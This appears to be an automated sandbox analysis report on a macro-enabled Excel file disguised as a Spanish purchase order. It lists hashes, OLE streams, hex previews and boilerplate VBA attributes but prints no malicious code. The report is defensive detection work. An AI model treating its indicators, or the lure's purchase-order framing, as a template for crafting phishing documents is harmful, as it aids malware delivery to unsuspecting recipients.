                                                                                            Preview:......................>.......................................................@...A...B...C...p...q...r.......-...............d.......f...............................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                            C:\Users\user\Desktop\54330000:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:false
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\Desktop\Orden_de_Compra_Nmero_6782929219.xls (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:58:03 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1062912
                                                                                            Entropy (8bit):7.778659222828756
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:4tmzHJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jJEPzcxyL+3hgLFM6xfU:pBambARM8FA8Z+jEd+RwFxf/XA+e
                                                                                            MD5:126A9BFB7B5465383C132D824FC2DA1D
                                                                                            SHA1:73BA715B840B6992917B3EB69BAB0B847FD5DC7C
                                                                                            SHA-256:5B0C550D298018EC9EF24FBE853FEA2D6354712BE5663D89EBD43A782E8F046C
                                                                                            SHA-512:DC68D854D7148035C4B934D6BF6665C83A27445A0CE3C3101B35ACF2E17FE70E211D20652BC066B72A070C58B3646AC3CFF1774D241AE952D0FDD9575DEDED3A
                                                                                            Malicious:true
                                                                                            Preview:......................>.......................................................@...A...B...C...p...q...r.......-...............d.......f...............................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 9 08:36:57 2024, Security: 1
                                                                                            Entropy (8bit):7.761951497204573
                                                                                            TrID:
                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                            File name:Orden_de_Compra_Nmero_6782929219.xls
                                                                                            File size:1'071'616 bytes
                                                                                            MD5:02312414e969b79f88ffde0b68090227
                                                                                            SHA1:aab17d76b523a0a1c79391468885ab855a6f2196
                                                                                            SHA256:8ca816015c1a43fa8cfe732759ba029e176f94e372176ccb8940d91cfc6a7984
                                                                                            SHA512:e88770bb146e0c0eb5ef4c5996ba03595daecc88e13161b8cddebcb703bd5741b08b79efed60f57f9b557b9e8fa84b51cbce56599fb3c98d70eed9ca98561228
                                                                                            SSDEEP:12288:OhmzHJEUiOIBUzMTS+D3DERnLRmF8DKEP3xpsAQx1Zj+j5EP0HtKSsiwfYIt0sZm:rBaXbARM8J38Z+j0EZFwpK6/OYrW
                                                                                            TLSH:603501D1B78DAB02DA55063535F387AE1725AC53E94242BB32F8771E2AF7AD08503F42
                                                                                            File Content Preview:........................>.......................................................@...A...B...C...p...q...r.........../...........d.......f......................................................................................................................

                                                                                            File Icon

                                                                                            Icon Hash:276ea3a6a6b7bfbf

                                                                                            Static OLE Info

                                                                                            General

                                                                                            Document Type:OLE
                                                                                            Number of OLE Files:1

                                                                                            OLE File "Orden_de_Compra_Nmero_6782929219.xls"

                                                                                            Indicators
                                                                                            Has Summary Info:
                                                                                            Application Name:Microsoft Excel
                                                                                            Encrypted Document:True
                                                                                            Contains Word Document Stream:False
                                                                                            Contains Workbook/Book Stream:True
                                                                                            Contains PowerPoint Document Stream:False
                                                                                            Contains Visio Document Stream:False
                                                                                            Contains ObjectPool Stream:False
                                                                                            Flash Objects Count:0
                                                                                            Contains VBA Macros:True
                                                                                            Summary
                                                                                            Code Page:1252
                                                                                            Author:
                                                                                            Last Saved By:
                                                                                            Create Time:2006-09-16 00:00:00
                                                                                            Last Saved Time:2024-12-09 08:36:57
                                                                                            Creating Application:Microsoft Excel
                                                                                            Security:1
                                                                                            Document Summary
                                                                                            Document Code Page:1252
                                                                                            Thumbnail Scaling Desired:False
                                                                                            Contains Dirty Links:False
                                                                                            Shared Document:False
                                                                                            Changed Hyperlinks:False
                                                                                            Application Version:786432

                                                                                            Streams with VBA

                                                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                            VBA File Name:Sheet1.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                            VBA File Name:Sheet2.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                            Stream Size:985
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                            VBA File Name:Sheet1.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T h . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 b5 81 68 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                            VBA File Name:Sheet2.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 b5 ca aa 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                            VBA File Name:Sheet3.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T d . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 b5 64 1c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                            Stream Size:985
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . H . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 b5 18 48 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            VBA Code
                                                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                            Streams

                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                            General
                                                                                            Stream Path:\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                            General
                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.889430592781307
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                            General
                                                                                            Stream Path:\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:200
                                                                                            Entropy:3.3020681057018666
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . J . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                            Stream Path: MBD00068A0E/\x1CompObj, File Type: data, Stream Size: 94
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:94
                                                                                            Entropy:4.345966460061678
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0E/\x1Ole, File Type: data, Stream Size: 20
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:20
                                                                                            Entropy:0.5689955935892812
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0E/CONTENTS, File Type: PDF document, version 1.3, 1 pages, Stream Size: 29526
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/CONTENTS
                                                                                            CLSID:
                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                            Stream Size:29526
                                                                                            Entropy:7.810444862277873
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                                                                                            Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                                                                                            Stream Path: MBD00068A0F/\x1CompObj, File Type: data, Stream Size: 114
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.701136490257069
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                            Stream Path: MBD00068A0F/\x5SummaryInformation, File Type: data, Stream Size: 220
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:220
                                                                                            Entropy:3.372234242231489
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                                                            Stream Path: MBD00068A0F/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:20
                                                                                            Entropy:0.5689955935892812
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/\x3ObjInfo
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:4
                                                                                            Entropy:0.8112781244591328
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . .
                                                                                            Data Raw:00 00 03 00
                                                                                            Stream Path: MBD00068A0F/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0018D4CE/Contents
                                                                                            CLSID:
                                                                                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                            Stream Size:197671
                                                                                            Entropy:6.989042939766534
                                                                                            Base64 Encoded:True
